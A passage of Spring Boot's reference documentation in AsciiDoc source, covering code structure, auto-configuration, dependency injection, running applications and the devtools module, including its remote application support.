logging system>>.\n\nTIP: For a list of additional community contributed starters, see the {spring-boot-master-code}\/spring-boot-project\/spring-boot-starters\/README.adoc[README file] in the `spring-boot-starters` module on GitHub.\n\n\n\n[[using-boot-structuring-your-code]]\n== Structuring Your Code\nSpring Boot does not require any specific code layout to work.\nHowever, there are some best practices that help.\n\n\n\n[[using-boot-using-the-default-package]]\n=== Using the \"`default`\" Package\nWhen a class does not include a `package` declaration, it is considered to be in the \"`default package`\".\nThe use of the \"`default package`\" is generally discouraged and should be avoided.\nIt can cause particular problems for Spring Boot applications that use the `@ComponentScan`, `@ConfigurationPropertiesScan`, `@EntityScan`, or `@SpringBootApplication` annotations, since every class from every jar is read.\n\nTIP: We recommend that you follow Java's recommended package naming conventions and use a reversed domain name (for example, `com.example.project`).\n\n\n\n[[using-boot-locating-the-main-class]]\n=== Locating the Main Application Class\nWe generally recommend that you locate your main application class in a root package above other classes.\nThe <<using-boot-using-springbootapplication-annotation, `@SpringBootApplication` annotation>> is often placed on your main class, and it implicitly defines a base \"`search package`\" for certain items.\nFor example, if you are writing a JPA application, the package of the `@SpringBootApplication` annotated class is used to search for `@Entity` items.\nUsing a root package also allows component scan to apply only on your project.\n\nTIP: If you don't want to use `@SpringBootApplication`, the `@EnableAutoConfiguration` and `@ComponentScan` annotations that it imports defines that behaviour so you can also use those instead.\n\nThe following listing shows a typical layout:\n\n[indent=0]\n----\n\tcom\n\t +- example\n\t +- myapplication\n\t +- Application.java\n\t |\n\t +- customer\n\t | +- Customer.java\n\t | +- CustomerController.java\n\t | +- CustomerService.java\n\t | +- CustomerRepository.java\n\t |\n\t +- order\n\t +- 
Order.java\n\t +- OrderController.java\n\t +- OrderService.java\n\t +- OrderRepository.java\n----\n\nThe `Application.java` file would declare the `main` method, along with the basic `@SpringBootApplication`, as follows:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\n\n\n[[using-boot-configuration-classes]]\n== Configuration Classes\nSpring Boot favors Java-based configuration.\nAlthough it is possible to use `SpringApplication` with XML sources, we generally recommend that your primary source be a single `@Configuration` class.\nUsually the class that defines the `main` method is a good candidate as the primary `@Configuration`.\n\nTIP: Many Spring configuration examples have been published on the Internet that use XML configuration.\nIf possible, always try to use the equivalent Java-based configuration.\nSearching for `+Enable*+` annotations can be a good starting point.\n\n\n\n[[using-boot-importing-configuration]]\n=== Importing Additional Configuration Classes\nYou need not put all your `@Configuration` into a single class.\nThe `@Import` annotation can be used to import additional configuration classes.\nAlternatively, you can use `@ComponentScan` to automatically pick up all Spring components, including `@Configuration` classes.\n\n\n\n[[using-boot-importing-xml-configuration]]\n=== Importing XML Configuration\nIf you absolutely must use XML based configuration, we recommend that you still start with a `@Configuration` class.\nYou can then use an `@ImportResource` annotation to load XML configuration files.\n\n\n\n[[using-boot-auto-configuration]]\n== Auto-configuration\nSpring Boot auto-configuration attempts to automatically configure your Spring application based on the jar dependencies that you have added.\nFor example, if `HSQLDB` is on your classpath, and you have not manually configured any database connection beans, then Spring Boot auto-configures an in-memory database.\n\nYou need to opt-in to auto-configuration by adding the `@EnableAutoConfiguration` or `@SpringBootApplication` annotations to one of your `@Configuration` classes.\n\nTIP: You should only ever add one `@SpringBootApplication` or `@EnableAutoConfiguration` annotation.\nWe generally recommend that you add one or the other to your primary `@Configuration` class only.\n\n\n\n[[using-boot-replacing-auto-configuration]]\n=== Gradually Replacing Auto-configuration\nAuto-configuration is non-invasive.\nAt any point, you can start to define your own configuration to replace specific parts of the auto-configuration.\nFor example, if you add your own `DataSource` bean, the default embedded database support backs away.\n\nIf you need to find out what auto-configuration is currently being applied, and why, start your application with the `--debug` switch.\nDoing so enables debug logs for a selection of core loggers and logs a conditions report to the console.\n\n\n\n[[using-boot-disabling-specific-auto-configuration]]\n=== Disabling Specific Auto-configuration Classes\nIf you find that specific auto-configuration classes that you do not want are being applied, you can use the exclude attribute of `@SpringBootApplication` to disable them, as shown in the following 
example:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.*;\n\timport org.springframework.boot.autoconfigure.jdbc.*;\n\n\t@SpringBootApplication(exclude={DataSourceAutoConfiguration.class})\n\tpublic class MyApplication {\n\t}\n----\n\nIf the class is not on the classpath, you can use the `excludeName` attribute of the annotation and specify the fully qualified name instead.\nIf you prefer to use `@EnableAutoConfiguration` rather than `@SpringBootApplication`, `exclude` and `excludeName` are also available.\nFinally, you can also control the list of auto-configuration classes to exclude by using the configprop:spring.autoconfigure.exclude[] property.\n\nTIP: You can define exclusions both at the annotation level and by using the property.\n\nNOTE: Even though auto-configuration classes are `public`, the only aspect of the class that is considered public API is the name of the class which can be used for disabling the auto-configuration.\nThe actual contents of those classes, such as nested configuration classes or bean methods are for internal use only and we do not recommend using those directly.\n\n\n\n[[using-boot-spring-beans-and-dependency-injection]]\n== Spring Beans and Dependency Injection\nYou are free to use any of the standard Spring Framework techniques to define your beans and their injected dependencies.\nWe often find that using `@ComponentScan` (to find your beans) and using `@Autowired` (to do constructor injection) works well.\n\nIf you structure your code as suggested above (locating your application class in a root package), you can add `@ComponentScan` without any arguments.\nAll of your application components (`@Component`, `@Service`, `@Repository`, `@Controller` etc.) are automatically registered as Spring Beans.\n\nThe following example shows a `@Service` Bean that uses constructor injection to obtain a required `RiskAssessor` bean:\n\n[source,java,indent=0]\n----\n\tpackage com.example.service;\n\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Service;\n\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\t@Autowired\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf a bean has one constructor, you can omit the `@Autowired`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: Notice how using constructor injection lets the `riskAssessor` field be marked as `final`, indicating that it cannot be subsequently changed.\n\n\n\n[[using-boot-using-springbootapplication-annotation]]\n== Using the @SpringBootApplication Annotation\nMany Spring Boot developers like their apps to use auto-configuration, component scan and be able to define extra configuration on their \"application class\".\nA single `@SpringBootApplication` annotation can be used to enable those three features, that is:\n\n* `@EnableAutoConfiguration`: enable <<using-boot-auto-configuration,Spring Boot's auto-configuration mechanism>>\n* `@ComponentScan`: enable `@Component` scan on the package where the application is located (see 
<<using-boot-structuring-your-code,the best practices>>)\n* `@Configuration`: register extra beans in the context or import additional configuration classes\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication \/\/ same as @Configuration @EnableAutoConfiguration @ComponentScan\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nNOTE: `@SpringBootApplication` also provides aliases to customize the attributes of `@EnableAutoConfiguration` and `@ComponentScan`.\n\n[NOTE]\n====\nNone of these features are mandatory and you may choose to replace this single annotation with any of the features that it enables.\nFor instance, you may not want to use component scan or configuration properties scan in your application:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.EnableAutoConfiguration;\n\timport org.springframework.context.annotation.Configuration;\n\timport org.springframework.context.annotation.Import;\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@Import({ MyConfig.class, MyAnotherConfig.class })\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nIn this example, `Application` is just like any other Spring Boot application except that `@Component`-annotated classes and `@ConfigurationProperties`-annotated classes are not detected automatically and the user-defined beans are imported explicitly (see `@Import`).\n====\n\n\n\n[[using-boot-running-your-application]]\n== Running Your Application\nOne of the biggest advantages of packaging your application as a jar and using an embedded HTTP server is that you can run your application as you would any other.\nThe same applies to debugging Spring Boot applications.\nYou do not need any special IDE plugins or extensions.\n\nNOTE: This section only covers jar-based packaging.\nIf you choose to package your application as a war file, you should refer to your server and IDE documentation.\n\n\n\n[[using-boot-running-from-an-ide]]\n=== Running from an IDE\nYou can run a Spring Boot application from your IDE as a Java application.\nHowever, you first need to import your project.\nImport steps vary depending on your IDE and build system.\nMost IDEs can import Maven projects directly.\nFor example, Eclipse users can select `Import...` -> `Existing Maven Projects` from the `File` menu.\n\nIf you cannot directly import your project into your IDE, you may be able to generate IDE metadata by using a build plugin.\nMaven includes plugins for https:\/\/maven.apache.org\/plugins\/maven-eclipse-plugin\/[Eclipse] and https:\/\/maven.apache.org\/plugins\/maven-idea-plugin\/[IDEA].\nGradle offers plugins for {gradle-docs}\/userguide.html[various IDEs].\n\nTIP: If you accidentally run a web application twice, you see a \"`Port already in use`\" error.\nSTS users can use the `Relaunch` button rather than the `Run` button to ensure that any existing instance is closed.\n\n\n\n[[using-boot-running-as-a-packaged-application]]\n=== Running as a Packaged Application\nIf you use the Spring Boot Maven or Gradle plugins to create an executable 
jar, you can run your application using `java -jar`, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\nIt is also possible to run a packaged application with remote debugging support enabled.\nDoing so lets you attach a debugger to your packaged application, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -Xdebug -Xrunjdwp:server=y,transport=dt_socket,address=8000,suspend=n \\\n\t -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\n\n\n[[using-boot-running-with-the-maven-plugin]]\n=== Using the Maven Plugin\nThe Spring Boot Maven plugin includes a `run` goal that can be used to quickly compile and run your application.\nApplications run in an exploded form, as they do in your IDE.\nThe following example shows a typical Maven command to run a Spring Boot application:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ mvn spring-boot:run\n----\n\nYou might also want to use the `MAVEN_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export MAVEN_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-running-with-the-gradle-plugin]]\n=== Using the Gradle Plugin\nThe Spring Boot Gradle plugin also includes a `bootRun` task that can be used to run your application in an exploded form.\nThe `bootRun` task is added whenever you apply the `org.springframework.boot` and `java` plugins and is shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ gradle bootRun\n----\n\nYou might also want to use the `JAVA_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export JAVA_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-hot-swapping]]\n=== Hot Swapping\nSince Spring Boot applications are plain Java applications, JVM hot-swapping should work out of the box.\nJVM hot swapping is somewhat limited with the bytecode that it can replace.\nFor a more complete solution, https:\/\/www.jrebel.com\/products\/jrebel[JRebel] can be used.\n\nThe `spring-boot-devtools` module also includes support for quick application restarts.\nSee the <<using-boot-devtools>> section later in this chapter and the <<howto.adoc#howto-hotswapping, Hot swapping \"`How-to`\">> for details.\n\n\n\n[[using-boot-devtools]]\n== Developer Tools\nSpring Boot includes an additional set of tools that can make the application development experience a little more pleasant.\nThe `spring-boot-devtools` module can be included in any project to provide additional development-time features.\nTo include devtools support, add the module dependency to your build, as shown in the following listings for Maven and Gradle:\n\n.Maven\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-devtools<\/artifactId>\n\t\t\t<optional>true<\/optional>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n.Gradle\n[source,groovy,indent=0,subs=\"attributes\"]\n----\n\tconfigurations {\n\t\tdevelopmentOnly\n\t\truntimeClasspath {\n\t\t\textendsFrom developmentOnly\n\t\t}\n\t}\n\tdependencies {\n\t\tdevelopmentOnly(\"org.springframework.boot:spring-boot-devtools\")\n\t}\n----\n\nNOTE: Developer tools are automatically disabled when running a fully packaged application.\nIf your application is launched from `java -jar` or if it is started from a special classloader, then it is 
considered a \"`production application`\".\nIf that does not apply to you (i.e. if you run your application from a container), consider excluding devtools or set the `-Dspring.devtools.restart.enabled=false` system property.\n\nTIP: Flagging the dependency as optional in Maven or using a custom `developmentOnly` configuration in Gradle (as shown above) is a best practice that prevents devtools from being transitively applied to other modules that use your project.\n\nTIP: Repackaged archives do not contain devtools by default.\nIf you want to use a <<using-boot-devtools-remote,certain remote devtools feature>>, you need to disable the `excludeDevtools` build property to include it.\nThe property is supported with both the Maven and Gradle plugins.\n\n\n\n[[using-boot-devtools-property-defaults]]\n=== Property Defaults\nSeveral of the libraries supported by Spring Boot use caches to improve performance.\nFor example, <<spring-boot-features#boot-features-spring-mvc-template-engines,template engines>> cache compiled templates to avoid repeatedly parsing template files.\nAlso, Spring MVC can add HTTP caching headers to responses when serving static resources.\n\nWhile caching is very beneficial in production, it can be counter-productive during development, preventing you from seeing the changes you just made in your application.\nFor this reason, spring-boot-devtools disables the caching options by default.\n\nCache options are usually configured by settings in your `application.properties` file.\nFor example, Thymeleaf offers the configprop:spring.thymeleaf.cache[] property.\nRather than needing to set these properties manually, the `spring-boot-devtools` module automatically applies sensible development-time configuration.\n\nBecause you need more information about web requests while developing Spring MVC and Spring WebFlux applications, developer tools will enable `DEBUG` logging for the `web` logging group.\nThis will give you information about the incoming request, which handler is processing it, the response outcome, etc.\nIf you wish to log all request details (including potentially sensitive information), you can turn on the configprop:spring.http.log-request-details[] configuration property.\n\nNOTE: If you don't want property defaults to be applied you can set configprop:spring.devtools.add-properties[] to `false` in your `application.properties`.\n\nTIP: For a complete list of the properties that are applied by the devtools, see {spring-boot-devtools-module-code}\/env\/DevToolsPropertyDefaultsPostProcessor.java[DevToolsPropertyDefaultsPostProcessor].\n\n\n\n[[using-boot-devtools-restart]]\n=== Automatic Restart\nApplications that use `spring-boot-devtools` automatically restart whenever files on the classpath change.\nThis can be a useful feature when working in an IDE, as it gives a very fast feedback loop for code changes.\nBy default, any entry on the classpath that points to a folder is monitored for changes.\nNote that certain resources, such as static assets and view templates, <<using-boot-devtools-restart-exclude, do not need to restart the application>>.\n\n.Triggering a restart\n****\nAs DevTools monitors classpath resources, the only way to trigger a restart is to update the classpath.\nThe way in which you cause the classpath to be updated depends on the IDE that you are using:\n\n* In Eclipse, saving a modified file causes the classpath to be updated and triggers a restart.\n* In IntelliJ IDEA, building the project (`Build +->+ Build Project`) has the same effect.\n* 
If using a build plugin, running `mvn compile` for Maven or `gradle build` for Gradle will trigger a restart. \n****\n\nNOTE: If you are restarting with Maven or Gradle using the build plugin you must leave the `forking` set to `enabled`.\nIf you disable forking, the isolated application classloader used by devtools will not be created and restarts will not operate properly.\n\nTIP: Automatic restart works very well when used with LiveReload.\n<<using-boot-devtools-livereload,See the LiveReload section>> for details.\nIf you use JRebel, automatic restarts are disabled in favor of dynamic class reloading.\nOther devtools features (such as LiveReload and property overrides) can still be used.\n\nNOTE: DevTools relies on the application context's shutdown hook to close it during a restart.\nIt does not work correctly if you have disabled the shutdown hook (`SpringApplication.setRegisterShutdownHook(false)`).\n\nNOTE: When deciding if an entry on the classpath should trigger a restart when it changes, DevTools automatically ignores projects named `spring-boot`, `spring-boot-devtools`, `spring-boot-autoconfigure`, `spring-boot-actuator`, and `spring-boot-starter`.\n\nNOTE: DevTools needs to customize the `ResourceLoader` used by the `ApplicationContext`.\nIf your application provides one already, it is going to be wrapped.\nDirect override of the `getResource` method on the `ApplicationContext` is not supported.\n\n[[using-spring-boot-restart-vs-reload]]\n.Restart vs Reload\n****\nThe restart technology provided by Spring Boot works by using two classloaders.\nClasses that do not change (for example, those from third-party jars) are loaded into a _base_ classloader.\nClasses that you are actively developing are loaded into a _restart_ classloader.\nWhen the application is restarted, the _restart_ classloader is thrown away and a new one is created.\nThis approach means that application restarts are typically much faster than \"`cold starts`\", since the _base_ classloader is already available and populated.\n\nIf you find that restarts are not quick enough for your applications or you encounter classloading issues, you could consider reloading technologies such as https:\/\/jrebel.com\/software\/jrebel\/[JRebel] from ZeroTurnaround.\nThese work by rewriting classes as they are loaded to make them more amenable to reloading.\n****\n\n\n\n[[using-boot-devtools-restart-logging-condition-delta]]\n==== Logging changes in condition evaluation\nBy default, each time your application restarts, a report showing the condition evaluation delta is logged.\nThe report shows the changes to your application's auto-configuration as you make changes such as adding or removing beans and setting configuration properties.\n\nTo disable the logging of the report, set the following property:\n\n[indent=0]\n----\n\tspring.devtools.restart.log-condition-evaluation-delta=false\n----\n\n\n[[using-boot-devtools-restart-exclude]]\n==== Excluding Resources\nCertain resources do not necessarily need to trigger a restart when they are changed.\nFor example, Thymeleaf templates can be edited in-place.\nBy default, changing resources in `\/META-INF\/maven`, `\/META-INF\/resources`, `\/resources`, `\/static`, `\/public`, or `\/templates` does not trigger a restart but does trigger a <<using-boot-devtools-livereload, live reload>>.\nIf you want to customize these exclusions, you can use the configprop:spring.devtools.restart.exclude[] property.\nFor example, to exclude only `\/static` and `\/public` you would set the following 
property:\n\n[indent=0]\n----\n\tspring.devtools.restart.exclude=static\/**,public\/**\n----\n\nTIP: If you want to keep those defaults and _add_ additional exclusions, use the configprop:spring.devtools.restart.additional-exclude[] property instead.\n\n\n\n[[using-boot-devtools-restart-additional-paths]]\n==== Watching Additional Paths\nYou may want your application to be restarted or reloaded when you make changes to files that are not on the classpath.\nTo do so, use the configprop:spring.devtools.restart.additional-paths[] property to configure additional paths to watch for changes.\nYou can use the configprop:spring.devtools.restart.exclude[] property <<using-boot-devtools-restart-exclude, described earlier>> to control whether changes beneath the additional paths trigger a full restart or a <<using-boot-devtools-livereload, live reload>>.\n\n\n\n[[using-boot-devtools-restart-disable]]\n==== Disabling Restart\nIf you do not want to use the restart feature, you can disable it by using the configprop:spring.devtools.restart.enabled[] property.\nIn most cases, you can set this property in your `application.properties` (doing so still initializes the restart classloader, but it does not watch for file changes).\n\nIf you need to _completely_ disable restart support (for example, because it does not work with a specific library), you need to set the configprop:spring.devtools.restart.enabled[] `System` property to `false` before calling `SpringApplication.run(...)`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSystem.setProperty(\"spring.devtools.restart.enabled\", \"false\");\n\t\tSpringApplication.run(MyApp.class, args);\n\t}\n----\n\n\n\n[[using-boot-devtools-restart-triggerfile]]\n==== Using a Trigger File\nIf you work with an IDE that continuously compiles changed files, you might prefer to trigger restarts only at specific times.\nTo do so, you can use a \"`trigger file`\", which is a special file that must be modified when you want to actually trigger a restart check.\n\nNOTE: Any update to the file will trigger a check, but restart only actually occurs if Devtools has detected it has something to do.\n\nTo use a trigger file, set the configprop:spring.devtools.restart.trigger-file[] property to the name (excluding any path) of your trigger file.\nThe trigger file must appear somewhere on your classpath.\n\nFor example, if you have a project with the following structure:\n\n[indent=0]\n----\n\tsrc\n\t+- main\n\t +- resources\n\t +- .reloadtrigger\n----\n\nThen your `trigger-file` property would be:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nRestarts will now only happen when the `src\/main\/resources\/.reloadtrigger` is updated.\n\nTIP: You might want to set `spring.devtools.restart.trigger-file` as a <<using-boot-devtools-globalsettings,global setting>>, so that all your projects behave in the same way.\n\nSome IDEs have features that save you from needing to update your trigger file manually.\nhttps:\/\/spring.io\/tools[Spring Tools for Eclipse] and https:\/\/www.jetbrains.com\/idea\/[IntelliJ IDEA (Ultimate Edition)] both have such support.\nWith Spring Tools, you can use the \"`reload`\" button from the console view (as long as your `trigger-file` is named `.reloadtrigger`).\nFor IntelliJ IDEA, you can follow the https:\/\/www.jetbrains.com\/help\/idea\/spring-boot.html#application-update-policies[instructions in their 
documentation].\n\n\n\n[[using-boot-devtools-customizing-classload]]\n==== Customizing the Restart Classloader\nAs described earlier in the <<using-spring-boot-restart-vs-reload>> section, restart functionality is implemented by using two classloaders.\nFor most applications, this approach works well.\nHowever, it can sometimes cause classloading issues.\n\nBy default, any open project in your IDE is loaded with the \"`restart`\" classloader, and any regular `.jar` file is loaded with the \"`base`\" classloader.\nIf you work on a multi-module project, and not every module is imported into your IDE, you may need to customize things.\nTo do so, you can create a `META-INF\/spring-devtools.properties` file.\n\nThe `spring-devtools.properties` file can contain properties prefixed with `restart.exclude` and `restart.include`.\nThe `include` elements are items that should be pulled up into the \"`restart`\" classloader, and the `exclude` elements are items that should be pushed down into the \"`base`\" classloader.\nThe value of the property is a regex pattern that is applied to the classpath, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\trestart.exclude.companycommonlibs=\/mycorp-common-[\\\\w\\\\d-\\.]+\\.jar\n\trestart.include.projectcommon=\/mycorp-myproj-[\\\\w\\\\d-\\.]+\\.jar\n----\n\nNOTE: All property keys must be unique.\nAs long as a property starts with `restart.include.` or `restart.exclude.` it is considered.\n\nTIP: All `META-INF\/spring-devtools.properties` from the classpath are loaded.\nYou can package files inside your project, or in the libraries that the project consumes.\n\n\n\n[[using-boot-devtools-known-restart-limitations]]\n==== Known Limitations\nRestart functionality does not work well with objects that are deserialized by using a standard `ObjectInputStream`.\nIf you need to deserialize data, you may need to use Spring's `ConfigurableObjectInputStream` in combination with `Thread.currentThread().getContextClassLoader()`.\n\nUnfortunately, several third-party libraries deserialize without considering the context classloader.\nIf you find such a problem, you need to request a fix with the original authors.\n\n\n\n[[using-boot-devtools-livereload]]\n=== LiveReload\nThe `spring-boot-devtools` module includes an embedded LiveReload server that can be used to trigger a browser refresh when a resource is changed.\nLiveReload browser extensions are freely available for Chrome, Firefox and Safari from http:\/\/livereload.com\/extensions\/[livereload.com].\n\nIf you do not want to start the LiveReload server when your application runs, you can set the configprop:spring.devtools.livereload.enabled[] property to `false`.\n\nNOTE: You can only run one LiveReload server at a time.\nBefore starting your application, ensure that no other LiveReload servers are running.\nIf you start multiple applications from your IDE, only the first has LiveReload support.\n\nWARNING: To trigger LiveReload when a file changes, <<using-boot-devtools-restart>> must be enabled.\n\n\n\n[[using-boot-devtools-globalsettings]]\n=== Global Settings\nYou can configure global devtools settings by adding any of the following files to the `$HOME\/.config\/spring-boot` folder:\n\n. `spring-boot-devtools.properties`\n. `spring-boot-devtools.yaml`\n. 
`spring-boot-devtools.yml`\n\nAny properties added to these files apply to _all_ Spring Boot applications on your machine that use devtools.\nFor example, to configure restart to always use a <<using-boot-devtools-restart-triggerfile, trigger file>>, you would add the following property:\n\n.~\/.config\/spring-boot\/spring-boot-devtools.properties\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nNOTE: If devtools configuration files are not found in `$HOME\/.config\/spring-boot`, the root of the `$HOME` folder is searched for the presence of a `.spring-boot-devtools.properties` file.\nThis allows you to share the devtools global configuration with applications that are on an older version of Spring Boot that does not support the `$HOME\/.config\/spring-boot` location.\n\n[NOTE]\n====\nProfiles are not supported in devtools properties\/yaml files.\n\nAny profiles activated in `.spring-boot-devtools.properties` will not affect the loading of <<spring-boot-features.adoc#boot-features-external-config-profile-specific-properties, profile-specific configuration files>>.\nProfile-specific filenames (of the form `spring-boot-devtools-<profile>.properties`) and `spring.profiles` sub-documents in YAML files are not supported.\n====\n\n\n\n[[configuring-file-system-watcher]]\n==== Configuring File System Watcher\n{spring-boot-devtools-module-code}\/filewatch\/FileSystemWatcher.java[FileSystemWatcher] works by polling for class changes at a certain time interval, and then waiting for a predefined quiet period to make sure there are no more changes.\nSince Spring Boot relies entirely on the IDE to compile and copy files into the location from where Spring Boot can read them, you might find that there are times when certain changes are not reflected when devtools restarts the application.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.poll-interval=2s\n\tspring.devtools.restart.quiet-period=1s\n----\n\nThe monitored classpath folders are now polled every 2 seconds for changes, and a 1 second quiet period is maintained to make sure there are no additional class changes.\n\n\n\n[[using-boot-devtools-remote]]\n=== Remote Applications\nThe Spring Boot developer tools are not limited to local development.\nYou can also use several features when running applications remotely.\nRemote support is opt-in as enabling it can be a security risk.\nIt should only be enabled when running on a trusted network or when secured with SSL.\nIf neither of these options is available to you, you should not use DevTools' remote support.\nYou should never enable support on a production deployment.\n\nTo enable it, you need to make sure that `devtools` is included in the repackaged archive, as shown in the following listing:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludeDevtools>false<\/excludeDevtools>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nThen you need to set the configprop:spring.devtools.remote.secret[] property.\n
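For example, a minimal sketch in your `application.properties` (the value shown is only a placeholder):\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.remote.secret=mysecret\n----\n\nLike any important password or secret, the value should 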
be unique and strong such that it cannot be guessed or brute-forced.\n\nRemote devtools support is provided in two parts: a server-side endpoint that accepts connections and a client application that you run in your IDE.\nThe server component is automatically enabled when the configprop:spring.devtools.remote.secret[] property is set.\nThe client component must be launched manually.\n\n\n\n==== Running the Remote Client Application\nThe remote client application is designed to be run from within your IDE.\nYou need to run `org.springframework.boot.devtools.RemoteSpringApplication` with the same classpath as the remote project that you connect to.\nThe application's single required argument is the remote URL to which it connects.\n\nFor example, if you are using Eclipse or STS and you have a project named `my-app` that you have deployed to Cloud Foundry, you would do the following:\n\n* Select `Run Configurations...` from the `Run` menu.\n* Create a new `Java Application` \"`launch configuration`\".\n* Browse for the `my-app` project.\n* Use `org.springframework.boot.devtools.RemoteSpringApplication` as the main class.\n* Add `+++https:\/\/myapp.cfapps.io+++` to the `Program arguments` (or whatever your remote URL is).\n\nA running remote client might resemble the following listing:\n\n[indent=0,subs=\"attributes\"]\n----\n\t . ____ _ __ _ _\n\t \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ ___ _ \\ \\ \\ \\\n\t( ( )\\___ | '_ | '_| | '_ \\\/ _` | | _ \\___ _ __ ___| |_ ___ \\ \\ \\ \\\n\t \\\\\/ ___)| |_)| | | | | || (_| []::::::[] \/ -_) ' \\\/ _ \\ _\/ -_) ) ) ) )\n\t ' |____| .__|_| |_|_| |_\\__, | |_|_\\___|_|_|_\\___\/\\__\\___|\/ \/ \/ \/\n\t =========|_|==============|___\/===================================\/_\/_\/_\/\n\t :: Spring Boot Remote :: {spring-boot-version}\n\n\t2015-06-10 18:25:06.632 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Starting RemoteSpringApplication on pwmbp with PID 14938 (\/Users\/pwebb\/projects\/spring-boot\/code\/spring-boot-project\/spring-boot-devtools\/target\/classes started by pwebb in \/Users\/pwebb\/projects\/spring-boot\/code)\n\t2015-06-10 18:25:06.671 INFO 14938 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a17b7b6: startup date [Wed Jun 10 18:25:06 PDT 2015]; root of context hierarchy\n\t2015-06-10 18:25:07.043 WARN 14938 --- [ main] o.s.b.d.r.c.RemoteClientConfiguration : The connection to http:\/\/localhost:8080 is insecure. 
You should use a URL starting with 'https:\/\/'.\n\t2015-06-10 18:25:07.074 INFO 14938 --- [ main] o.s.b.d.a.OptionalLiveReloadServer : LiveReload server is running on port 35729\n\t2015-06-10 18:25:07.130 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Started RemoteSpringApplication in 0.74 seconds (JVM running for 1.105)\n----\n\nNOTE: Because the remote client is using the same classpath as the real application it can directly read application properties.\nThis is how the configprop:spring.devtools.remote.secret[] property is read and passed to the server for authentication.\n\nTIP: It is always advisable to use `https:\/\/` as the connection protocol, so that traffic is encrypted and passwords cannot be intercepted.\n\nTIP: If you need to use a proxy to access the remote application, configure the `spring.devtools.remote.proxy.host` and `spring.devtools.remote.proxy.port` properties.\n\n\n\n[[using-boot-devtools-remote-update]]\n==== Remote Update\nThe remote client monitors your application classpath for changes in the same way as the <<using-boot-devtools-restart,local restart>>.\nAny updated resource is pushed to the remote application and (_if required_) triggers a restart.\nThis can be helpful if you iterate on a feature that uses a cloud service that you do not have locally.\nGenerally, remote updates and restarts are much quicker than a full rebuild and deploy cycle.\n\nOn a slower development environment, it may happen that the quiet period is not enough, and the changes in the classes may be split into batches.\nThe server is restarted after the first batch of class changes is uploaded.\nThe next batch can\u2019t be sent to the application, since the server is restarting.\n\nThis is typically manifested by a warning in the `RemoteSpringApplication` logs about failing to upload some of the classes, and a consequent retry.\nBut it may also lead to application code inconsistency and failure to restart after the first batch of changes is uploaded.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development 